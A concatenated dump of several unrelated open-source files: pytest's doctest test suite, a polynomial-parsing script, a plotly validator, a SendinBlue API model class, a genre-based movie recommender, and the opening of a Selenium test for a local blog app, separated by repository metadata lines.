result.stdout.fnmatch_lines([
'004 *>>> i = 0',
'005 *>>> i + 1',
'*Expected:',
"* 2",
"*Got:",
"* 1",
"*:5: DocTestFailure"
])
def test_txtfile_failing(self, testdir):
p = testdir.maketxtfile("""
>>> i = 0
>>> i + 1
2
""")
result = testdir.runpytest(p, "-s")
result.stdout.fnmatch_lines([
'001 >>> i = 0',
'002 >>> i + 1',
'Expected:',
" 2",
"Got:",
" 1",
"*test_txtfile_failing.txt:2: DocTestFailure"
])
def test_txtfile_with_fixtures(self, testdir):
p = testdir.maketxtfile("""
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(passed=1)
def test_txtfile_with_usefixtures_in_ini(self, testdir):
testdir.makeini("""
[pytest]
usefixtures = myfixture
""")
testdir.makeconftest("""
import pytest
@pytest.fixture
def myfixture(monkeypatch):
monkeypatch.setenv("HELLO", "WORLD")
""")
p = testdir.maketxtfile("""
>>> import os
>>> os.environ["HELLO"]
'WORLD'
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(passed=1)
def test_doctestmodule_with_fixtures(self, testdir):
p = testdir.makepyfile("""
'''
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=1)
def test_doctestmodule_three_tests(self, testdir):
p = testdir.makepyfile("""
'''
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
'''
def my_func():
'''
>>> magic = 42
>>> magic - 42
0
'''
def unuseful():
pass
def another():
'''
>>> import os
>>> os is os
True
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=3)
def test_doctestmodule_two_tests_one_fail(self, testdir):
p = testdir.makepyfile("""
class MyClass(object):
def bad_meth(self):
'''
>>> magic = 42
>>> magic
0
'''
def nice_meth(self):
'''
>>> magic = 42
>>> magic - 42
0
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1, passed=1)
def test_ignored_whitespace(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE
""")
p = testdir.makepyfile("""
class MyClass(object):
'''
>>> a = "foo "
>>> print(a)
foo
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=1)
def test_non_ignored_whitespace(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS
""")
p = testdir.makepyfile("""
class MyClass(object):
'''
>>> a = "foo "
>>> print(a)
foo
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1, passed=0)
def test_ignored_whitespace_glob(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE
""")
p = testdir.maketxtfile(xdoc="""
>>> a = "foo "
>>> print(a)
foo
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(passed=1)
def test_non_ignored_whitespace_glob(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS
""")
p = testdir.maketxtfile(xdoc="""
>>> a = "foo "
>>> print(a)
foo
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(failed=1, passed=0)
def test_contains_unicode(self, testdir):
"""Fix internal error with docstrings containing non-ascii characters.
"""
testdir.makepyfile(u'''
# encoding: utf-8
def foo():
"""
>>> name = 'с' # not letter 'c' but instead Cyrillic 's'.
'anything'
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'Got nothing',
'* 1 failed in*',
])
def test_ignore_import_errors_on_doctest(self, testdir):
p = testdir.makepyfile("""
import asdf
def add_one(x):
'''
>>> add_one(1)
2
'''
return x + 1
""")
reprec = testdir.inline_run(p, "--doctest-modules",
"--doctest-ignore-import-errors")
reprec.assertoutcome(skipped=1, failed=1, passed=0)
def test_junit_report_for_doctest(self, testdir):
"""
#713: Fix --junit-xml option when used with --doctest-modules.
"""
p = testdir.makepyfile("""
def foo():
'''
>>> 1 + 1
3
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules",
"--junit-xml=junit.xml")
reprec.assertoutcome(failed=1)
def test_unicode_doctest(self, testdir):
"""
Test case for issue 2434: DecodeError on Python 2 when doctest contains non-ascii
characters.
"""
p = testdir.maketxtfile(test_unicode_doctest="""
.. doctest::
>>> print(
... "Hi\\n\\nByé")
Hi
...
Byé
>>> 1/0 # Byé
1
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
'*UNEXPECTED EXCEPTION: ZeroDivisionError*',
'*1 failed*',
])
def test_unicode_doctest_module(self, testdir):
"""
Test case for issue 2434: DecodeError on Python 2 when doctest docstring
contains non-ascii characters.
"""
p = testdir.makepyfile(test_unicode_doctest_module="""
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
def fix_bad_unicode(text):
'''
>>> print(fix_bad_unicode('único'))
único
'''
return "único"
""")
result = testdir.runpytest(p, '--doctest-modules')
result.stdout.fnmatch_lines(['* 1 passed *'])
def test_reportinfo(self, testdir):
'''
Test case to make sure that DoctestItem.reportinfo() returns lineno.
'''
p = testdir.makepyfile(test_reportinfo="""
def foo(x):
'''
>>> foo('a')
'b'
'''
return 'c'
""")
items, reprec = testdir.inline_genitems(p, '--doctest-modules')
reportinfo = items[0].reportinfo()
assert reportinfo[1] == 1
def test_valid_setup_py(self, testdir):
'''
Test to make sure that pytest ignores valid setup.py files when ran
with --doctest-modules
'''
p = testdir.makepyfile(setup="""
from setuptools import setup, find_packages
setup(name='sample',
version='0.0',
description='description',
packages=find_packages()
)
""")
result = testdir.runpytest(p, '--doctest-modules')
result.stdout.fnmatch_lines(['*collected 0 items*'])
def test_invalid_setup_py(self, testdir):
    '''
    Test to make sure that pytest reads setup.py files that are not used
    for python packages when ran with --doctest-modules
    '''
    # A file merely *named* setup.py, with ordinary test content, must
    # still be collected (1 item), unlike a real packaging setup.py.
    p = testdir.makepyfile(setup="""
        def test_foo():
            return 'bar'
    """)
    result = testdir.runpytest(p, '--doctest-modules')
    result.stdout.fnmatch_lines(['*collected 1 item*'])
class TestLiterals(object):
    """Tests for the ALLOW_UNICODE / ALLOW_BYTES doctest option flags,
    which normalize u''/b'' literal prefixes across Python 2 and 3."""

    @pytest.mark.parametrize('config_mode', ['ini', 'comment'])
    def test_allow_unicode(self, testdir, config_mode):
        """Test that doctests which output unicode work in all python versions
        tested by pytest when the ALLOW_UNICODE option is used (either in
        the ini file or by an inline comment).
        """
        if config_mode == 'ini':
            testdir.makeini('''
            [pytest]
            doctest_optionflags = ALLOW_UNICODE
            ''')
            comment = ''
        else:
            comment = '#doctest: +ALLOW_UNICODE'

        # The same doctest is exercised both from a text file and from a
        # module docstring, hence passed=2 below.
        testdir.maketxtfile(test_doc="""
            >>> b'12'.decode('ascii') {comment}
            '12'
        """.format(comment=comment))
        testdir.makepyfile(foo="""
            def foo():
              '''
              >>> b'12'.decode('ascii') {comment}
              '12'
              '''
        """.format(comment=comment))
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(passed=2)

    @pytest.mark.parametrize('config_mode', ['ini', 'comment'])
    def test_allow_bytes(self, testdir, config_mode):
        """Test that doctests which output bytes work in all python versions
        tested by pytest when the ALLOW_BYTES option is used (either in
        the ini file or by an inline comment)(#1287).
        """
        if config_mode == 'ini':
            testdir.makeini('''
            [pytest]
            doctest_optionflags = ALLOW_BYTES
            ''')
            comment = ''
        else:
            comment = '#doctest: +ALLOW_BYTES'

        testdir.maketxtfile(test_doc="""
            >>> b'foo' {comment}
            'foo'
        """.format(comment=comment))
        testdir.makepyfile(foo="""
            def foo():
              '''
              >>> b'foo' {comment}
              'foo'
              '''
        """.format(comment=comment))
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(passed=2)

    def test_unicode_string(self, testdir):
        """Test that doctests which output unicode fail in Python 2 when
        the ALLOW_UNICODE option is not used. The same test should pass
        in Python 3.
        """
        testdir.maketxtfile(test_doc="""
            >>> b'12'.decode('ascii')
            '12'
        """)
        reprec = testdir.inline_run()
        # On py2 decode() yields u'12', mismatching '12' without ALLOW_UNICODE.
        passed = int(sys.version_info[0] >= 3)
        reprec.assertoutcome(passed=passed, failed=int(not passed))

    def test_bytes_literal(self, testdir):
        """Test that doctests which output bytes fail in Python 3 when
        the ALLOW_BYTES option is not used. The same test should pass
        in Python 2 (#1287).
        """
        testdir.maketxtfile(test_doc="""
            >>> b'foo'
            'foo'
        """)
        reprec = testdir.inline_run()
        # On py3 the repr is b'foo', mismatching 'foo' without ALLOW_BYTES.
        passed = int(sys.version_info[0] == 2)
        reprec.assertoutcome(passed=passed, failed=int(not passed))
class TestDoctestSkips(object):
    """
    If all examples in a doctest are skipped due to the SKIP option, then
    the tests should be SKIPPED rather than PASSED. (#957)
    """

    @pytest.fixture(params=['text', 'module'])
    def makedoctest(self, testdir, request):
        # Factory fixture: writes the same doctest either as a standalone
        # text file or as a module docstring, so each test runs both ways.
        def makeit(doctest):
            mode = request.param
            if mode == 'text':
                testdir.maketxtfile(doctest)
            else:
                assert mode == 'module'
                testdir.makepyfile('"""\n%s"""' % doctest)
        return makeit

    def test_one_skipped(self, testdir, makedoctest):
        # One example skipped, one passing: the doctest as a whole passes.
        makedoctest("""
            >>> 1 + 1  # doctest: +SKIP
            2
            >>> 2 + 2
            4
        """)
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(passed=1)

    def test_one_skipped_failed(self, testdir, makedoctest):
        # The non-skipped example is wrong, so the doctest fails.
        makedoctest("""
            >>> 1 + 1  # doctest: +SKIP
            2
            >>> 2 + 2
            200
        """)
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(failed=1)

    def test_all_skipped(self, testdir, makedoctest):
        # Every example skipped: the item must be reported as skipped (#957).
        makedoctest("""
            >>> 1 + 1  # doctest: +SKIP
            2
            >>> 2 + 2  # doctest: +SKIP
            200
        """)
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(skipped=1)

    def test_vacuous_all_skipped(self, testdir, makedoctest):
        # An empty doctest collects nothing: neither passed nor skipped.
        makedoctest('')
        reprec = testdir.inline_run("--doctest-modules")
        reprec.assertoutcome(passed=0, skipped=0)
class TestDoctestAutoUseFixtures(object):
    """Tests that autouse fixtures of every scope interact correctly with
    doctest items (modules and text files)."""

    SCOPES = ['module', 'session', 'class', 'function']

    def test_doctest_module_session_fixture(self, testdir):
        """Test that session fixtures are initialized for doctest modules (#768)
        """
        # session fixture which changes some global data, which will
        # be accessed by doctests in a module
        testdir.makeconftest("""
            import pytest
            import sys

            @pytest.yield_fixture(autouse=True, scope='session')
            def myfixture():
                assert not hasattr(sys, 'pytest_session_data')
                sys.pytest_session_data = 1
                yield
                del sys.pytest_session_data
        """)
        testdir.makepyfile(foo="""
            import sys

            def foo():
              '''
              >>> assert sys.pytest_session_data == 1
              '''

            def bar():
              '''
              >>> assert sys.pytest_session_data == 1
              '''
        """)
        result = testdir.runpytest("--doctest-modules")
        result.stdout.fnmatch_lines('*2 passed*')

    @pytest.mark.parametrize('scope', SCOPES)
    @pytest.mark.parametrize('enable_doctest', [True, False])
    def test_fixture_scopes(self, testdir, scope, enable_doctest):
        """Test that auto-use fixtures work properly with doctest modules.
        See #1057 and #1100.
        """
        testdir.makeconftest('''
            import pytest

            @pytest.fixture(autouse=True, scope="{scope}")
            def auto(request):
                return 99
        '''.format(scope=scope))
        testdir.makepyfile(test_1='''
            def test_foo():
                """
                >>> getfixture('auto') + 1
                100
                """
            def test_bar():
                assert 1
        ''')
        # With doctests enabled the docstring adds a third passing item.
        params = ('--doctest-modules',) if enable_doctest else ()
        passes = 3 if enable_doctest else 2
        result = testdir.runpytest(*params)
        result.stdout.fnmatch_lines(['*=== %d passed in *' % passes])

    @pytest.mark.parametrize('scope', SCOPES)
    @pytest.mark.parametrize('autouse', [True, False])
    @pytest.mark.parametrize('use_fixture_in_doctest', [True, False])
    def test_fixture_module_doctest_scopes(self, testdir, scope, autouse,
                                           use_fixture_in_doctest):
        """Test that auto-use fixtures work properly with doctest files.
        See #1057 and #1100.
        """
        testdir.makeconftest('''
            import pytest

            @pytest.fixture(autouse={autouse}, scope="{scope}")
            def auto(request):
                return 99
        '''.format(scope=scope, autouse=autouse))
        if use_fixture_in_doctest:
            testdir.maketxtfile(test_doc="""
                >>> getfixture('auto')
                99
            """)
        else:
            testdir.maketxtfile(test_doc="""
                >>> 1 + 1
                2
            """)
        result = testdir.runpytest('--doctest-modules')
        assert 'FAILURES' not in str(result.stdout.str())
        result.stdout.fnmatch_lines(['*=== 1 passed in *'])

    @pytest.mark.parametrize('scope', SCOPES)
    def test_auto_use_request_attributes(self, testdir, scope):
        """Check that all attributes of a request in an autouse fixture
        behave as expected when requested for a doctest item.
        """
        # For text-file doctests there is no module/class/function, so the
        # corresponding request attributes must be None for each scope.
        testdir.makeconftest('''
            import pytest

            @pytest.fixture(autouse=True, scope="{scope}")
            def auto(request):
                if "{scope}" == 'module':
                    assert request.module is None
                if "{scope}" == 'class':
                    assert request.cls is None
                if "{scope}" == 'function':
                    assert request.function is None
                return 99
        '''.format(scope=scope))
        testdir.maketxtfile(test_doc="""
            >>> 1 + 1
            2
        """)
        result = testdir.runpytest('--doctest-modules')
        assert 'FAILURES' not in str(result.stdout.str())
        result.stdout.fnmatch_lines(['*=== 1 passed in *'])
class TestDoctestNamespaceFixture(object):
    """Tests for the `doctest_namespace` fixture, which injects names into
    the globals seen by collected doctests."""

    SCOPES = ['module', 'session', 'class', 'function']

    @pytest.mark.parametrize('scope', SCOPES)
    def test_namespace_doctestfile(self, testdir, scope):
        """
        Check that inserting something into the namespace works in a
        simple text file doctest
        """
        testdir.makeconftest("""
            import pytest
            import contextlib

            @pytest.fixture(autouse=True, scope="{scope}")
            def add_contextlib(doctest_namespace):
                doctest_namespace['cl'] = contextlib
        """.format(scope=scope))
        # 'cl' is only defined via doctest_namespace, so passing proves
        # the injection worked for a .txt doctest at every fixture scope.
        p = testdir.maketxtfile("""
            >>> print(cl.__name__)
            contextlib
        """)
        reprec = testdir.inline_run(p)
        reprec.assertoutcome(passed=1)

    @pytest.mark.parametrize('scope', SCOPES)
    def test_namespace_pyfile(self, testdir, scope):
        """
        Check that inserting something into the namespace works in a
        simple Python file docstring doctest
        """
        testdir.makeconftest("""
            import pytest
            import contextlib

            @pytest.fixture(autouse=True, scope="{scope}")
            def add_contextlib(doctest_namespace):
                doctest_namespace['cl'] = contextlib
        """.format(scope=scope))
        p = testdir.makepyfile("""
            def foo():
                '''
                >>> print(cl.__name__)
                contextlib
                '''
        """)
        reprec = testdir.inline_run(p, "--doctest-modules")
        reprec.assertoutcome(passed=1)
class TestDoctestReportingOption(object):
    """Tests for the --doctest-report option, which selects the diff format
    used when a doctest's actual output differs from the expected output."""

    def _run_doctest_report(self, testdir, format):
        # Shared failing doctest: expected table says "1  2  4" but the
        # code prints "1  2  5", guaranteeing a diff for every format.
        testdir.makepyfile("""
            def foo():
                '''
                >>> foo()
                   a  b
                0  1  4
                1  2  4
                2  3  6
                '''
                print('   a  b\\n'
                      '0  1  4\\n'
                      '1  2  5\\n'
                      '2  3  6')
        """)
        return testdir.runpytest("--doctest-modules", "--doctest-report", format)

    @pytest.mark.parametrize('format', ['udiff', 'UDIFF', 'uDiFf'])
    def test_doctest_report_udiff(self, testdir, format):
        # Format matching is case-insensitive.
        result = self._run_doctest_report(testdir, format)
        result.stdout.fnmatch_lines([
            '     0  1  4',
            '    -1  2  4',
            '    +1  2  5',
            '     2  3  6',
        ])

    def test_doctest_report_cdiff(self, testdir):
        result = self._run_doctest_report(testdir, 'cdiff')
        result.stdout.fnmatch_lines([
            '         a  b',
            '      0  1  4',
            '    ! 1  2  4',
            '      2  3  6',
            '    --- 1,4 ----',
            '         a  b',
            '      0  1  4',
            '    ! 1  2  5',
            '      2  3  6',
        ])

    def test_doctest_report_ndiff(self, testdir):
        result = self._run_doctest_report(testdir, 'ndiff')
        result.stdout.fnmatch_lines([
            '         a  b',
            '      0  1  4',
            '    - 1  2  4',
            '    ?       ^',
            '    + 1  2  5',
            '    ?       ^',
            '      2  3  6',
        ])

    @pytest.mark.parametrize('format', ['none', 'only_first_failure'])
    def test_doctest_report_none_or_only_first_failure(self, testdir, format):
        # These formats show plain Expected/Got output instead of a diff.
        result = self._run_doctest_report(testdir, format)
        result.stdout.fnmatch_lines([
            'Expected:',
            '       a  b',
            '    0  1  4',
            '    1  2  4',
            '    2  3  6',
            'Got:',
            '       a  b',
            '    0  1  4',
            '    1  2  5',
            '    2  3  6',
        ])

    def test_doctest_report_invalid(self, testdir):
        # An unknown format must be rejected by argparse with a clear error.
        result = self._run_doctest_report(testdir, 'obviously_invalid_format')
        result.stderr.fnmatch_lines([
            "*error: argument --doctest-report: invalid choice: 'obviously_invalid_format' (choose from*"
        ])
| 32.386454 | 105 | 0.490405 |
ff1e90e1472653bd3368e620345df18e0e561371 | 654 | py | Python | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | 1 | 2019-04-17T00:18:13.000Z | 2019-04-17T00:18:13.000Z | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | null | null | null | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | null | null | null | from MultielementPolynomial.src.parser.parser import Parser
from MultielementPolynomial.src.mplist import get_mp_struct, convert
def main():
expr_1 = "8*x^9+5*x^8*y^7+3*x^4*y^4+6*y^2-5"
expr_2 = "6*x^5*y^4+7*x^3*y^2+21*x*y^2+8"
p_1 = Parser(expr_1)
ex_1 = p_1.parse()
vars_1 = list(ex_1.vars)
value_1 = ex_1.get_value()
print(get_mp_struct(value_1, vars_1))
p_2 = Parser(expr_2)
ex_2 = p_2.parse()
vars_2 = list(ex_2.vars)
value_2 = ex_2.get_value()
print(get_mp_struct(value_2, vars_2))
mp_1 = convert(ex_1)
mp_2 = convert(ex_2)
print(mp_1 * mp_2)
if __name__ == '__main__':
main()
| 23.357143 | 68 | 0.646789 |
321a2b976f77f6d80094268622882fae99820723 | 427 | py | Python | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | import _plotly_utils.basevalidators
class IdsValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name="ids", parent_name="bar", **kwargs):
super(IdsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
anim=kwargs.pop("anim", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs,
)
| 32.846154 | 71 | 0.644028 |
dc04af8c4672908cae13c830079b386c48ea12c1 | 4,737 | py | Python | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 46 | 2018-12-18T21:37:18.000Z | 2022-03-30T20:38:29.000Z | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 41 | 2018-03-02T13:22:48.000Z | 2021-11-25T04:32:03.000Z | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 45 | 2018-01-22T14:42:32.000Z | 2021-12-16T19:58:45.000Z | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: contact@sendinblue.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
# Swagger/OpenAPI-generated model: keep edits minimal so the file can be
# regenerated from the spec without losing changes.
class GetContacts(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """

    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'contacts': 'list[object]',
        'count': 'int'
    }

    attribute_map = {
        'contacts': 'contacts',
        'count': 'count'
    }

    def __init__(self, contacts=None, count=None):  # noqa: E501
        """GetContacts - a model defined in Swagger"""  # noqa: E501

        self._contacts = None
        self._count = None
        self.discriminator = None

        # Both assignments go through the property setters below, which
        # reject None — so contacts and count are effectively required.
        self.contacts = contacts
        self.count = count

    @property
    def contacts(self):
        """Gets the contacts of this GetContacts.  # noqa: E501


        :return: The contacts of this GetContacts.  # noqa: E501
        :rtype: list[object]
        """
        return self._contacts

    @contacts.setter
    def contacts(self, contacts):
        """Sets the contacts of this GetContacts.


        :param contacts: The contacts of this GetContacts.  # noqa: E501
        :type: list[object]
        """
        if contacts is None:
            raise ValueError("Invalid value for `contacts`, must not be `None`")  # noqa: E501

        self._contacts = contacts

    @property
    def count(self):
        """Gets the count of this GetContacts.  # noqa: E501

        Number of contacts  # noqa: E501

        :return: The count of this GetContacts.  # noqa: E501
        :rtype: int
        """
        return self._count

    @count.setter
    def count(self, count):
        """Sets the count of this GetContacts.

        Number of contacts  # noqa: E501

        :param count: The count of this GetContacts.  # noqa: E501
        :type: int
        """
        if count is None:
            raise ValueError("Invalid value for `count`, must not be `None`")  # noqa: E501

        self._count = count

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(GetContacts, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, GetContacts):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 32.445205 | 856 | 0.568292 |
79e26c86be889bbedce90f1f952afa1e472f6872 | 3,302 | py | Python | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | import numpy as np
from get_dictionaries import *
import pandas as pd
def meilleur_score(d,n):
liste=[]
new_d={}
for k, v in sorted(d.items(), key=lambda x: x[1]):
liste.append([k,v])
liste.reverse()
for i in range(n):
new_d[liste[i][0]]=liste[i][1]
return new_d
def average_popular(movies,movie):
n=len(movies[movie]['ratings'])
if n<20:
return 0
average=sum([float(movies[movie]['ratings'][rating]) for rating in movies[movie]['ratings']])
return average/n
def best_average_per_genre(movies):
genres={}
for movie in movies:
movie_genres=movies[movie]['genre']
movie_genres=movie_genres.split('|')
for genre in movie_genres:
if genre in genres:
genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie) #a def
else:
genres[genre]={}
genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie)
return genres
def suggestion(user,dic_users,movies,average_genres):
dic_user=dic_users[user]
#Cherche le genre favori de l'utilisateur
genres={}
for movie in dic_user:
if float(dic_user[movie])>=4:
id=[key for key in movies if movies[key]['Name_Year']==movie]
if len(id)==1:
genre=movies[id[0]]['genre']
genre=genre.split('|')
for word in genre :
if word in genres:
genres[word]+=1
else:
genres[word]=1
best_genre=[key for key in meilleur_score(genres,1)][0]
print(best_genre)
suggestion=average_genres[best_genre]
for movie in dic_user:
if movie in suggestion:
del suggestion[movie]
suggestion= meilleur_score(suggestion,10)
#Transformer les données en dataframe Panda
result={'movies':[],'score':[]}
for movie in suggestion:
result['movies'].append(movie)
result['score'].append(suggestion[movie])
result['movies'].append(best_genre)
result['score'].append('0')
result=pd.DataFrame(result)
#Créer objet de type JSON
result.to_json ('.\Genre_p.json')
return result
dic_users['josephine']={'The Boss Baby (2017)':'4.5','Coco (2017)':'3.5', 'Shrek the Third (2007)':'4.5','Incredibles 2 (2018)':'4','Princess and the Frog, The (2009)':'5','Finding Nemo (2003)':'4','WALL·E (2008)':'4'}
dic_users['victor']={'Howl`s Moving Castle (Hauru no ugoku shiro) (2004)':'3','Pom Poko (a.k.a. Raccoon War, The) (Heisei tanuki gassen pompoko) (1994)':'4.5','My Neighbor Totoro (Tonari no Totoro) (1988)':'4','Spirited Away (Sen to Chihiro no kamikakushi) (2001)':'5','Your Name. (2016)':'5',"Kiki's Delivery Service (Majo no takkyûbin) (1989)":'3.5',}
dic_users['pierre']={'Spider-Man 2 (2004)':'4','Inception (2010)':'4','Captain America: The First Avenger (2011)':'3.5','Superman/Batman: Public Enemies (2009)':'2','Star Wars: The Last Jedi (2017)':'4.5', 'Matrix Reloaded, The (2003)':'4','Lord of the Rings: The Return of the King, The (2003)':'3','Avengers: Infinity War - Part I (2018)':'5', 'Iron Man 3 (2013)':'3.5','Thor: Ragnarok (2017)':'5',}
print(suggestion('josephine',dic_users,movies,best_average_per_genre(movies)))
| 40.765432 | 401 | 0.61811 |
028fd31cc5e83cc82f56c9c03f08a47797f72754 | 8,484 | py | Python | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
from random import randint
from selenium.webdriver.chrome.options import Options
# Run Chrome headless so the suite works without a display; the matching
# chromedriver binary is fetched/located by webdriver-manager.
options = Options()
options.headless = True
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)
def locator(xp):
    """Wait (max 5 s) until the element at XPath ``xp`` is visible, return it."""
    wait = WebDriverWait(driver, 5)
    return wait.until(EC.visibility_of_element_located((By.XPATH, xp)))
def locators(xp):
    """Wait (max 5 s) until all elements at XPath ``xp`` are visible; return the list."""
    wait = WebDriverWait(driver, 5)
    return wait.until(EC.visibility_of_all_elements_located((By.XPATH, xp)))
def fill_input_fields_and_send(my_list, field_list, btn):
    """Type each value from ``my_list`` into the corresponding field of
    ``field_list``, then click ``btn`` to submit.

    Uses zip instead of index arithmetic; pairs beyond the shorter list
    are ignored instead of raising IndexError.
    """
    for value, field in zip(my_list, field_list):
        field.send_keys(value)
    btn.click()
def compare_two_lists(real_list, expected_list, attr):
    """Assert that, element by element, the value of attribute ``attr`` of
    each element in ``real_list`` equals the matching entry of
    ``expected_list`` (raises AssertionError on the first mismatch)."""
    for i, element in enumerate(real_list):
        assert element.get_attribute(attr) == expected_list[i]
def create_text_list(real_list, new_list):
    """Append the ``.text`` of every element in ``real_list`` to
    ``new_list`` (mutates ``new_list`` in place; returns None)."""
    new_list.extend(element.text for element in real_list)
# locators
# XPath selectors shared by the tests below.
form_input_fields_xp = '//form/fieldset//fieldset//input'  # article editor text inputs
textarea_xp = '//fieldset/textarea'  # article body textarea
publish_btn_xp = '//form/button'  # "Publish Article" button
home_link_xp = '//nav/div/ul/li/a[contains(text(), "Home")]'
global_feed_list_xp = '//div[@class="home-global"]//a[@class="preview-link"]/h1'  # Global Feed titles
all_pages_link_xp = '//nav/ul/li[@class="page-item"]/a'  # pagination links
logout_xp = '//*[@id="app"]/nav/div/ul/li[5]/a[@active-class="active"]'
# ------------------------------------------------------------------------------------------
# A011_CON_TC10_Új blogbejegyzés (minden mező kitöltése)
def test_new_blog():
    """A011_CON_TC10: register a new user, create a blog post with all
    fields filled, and verify it appears on the article page and in the
    Global Feed. Saves credentials/post data to files for the next test."""
    url = "http://localhost:1667"
    driver.get(url)
    time.sleep(2)
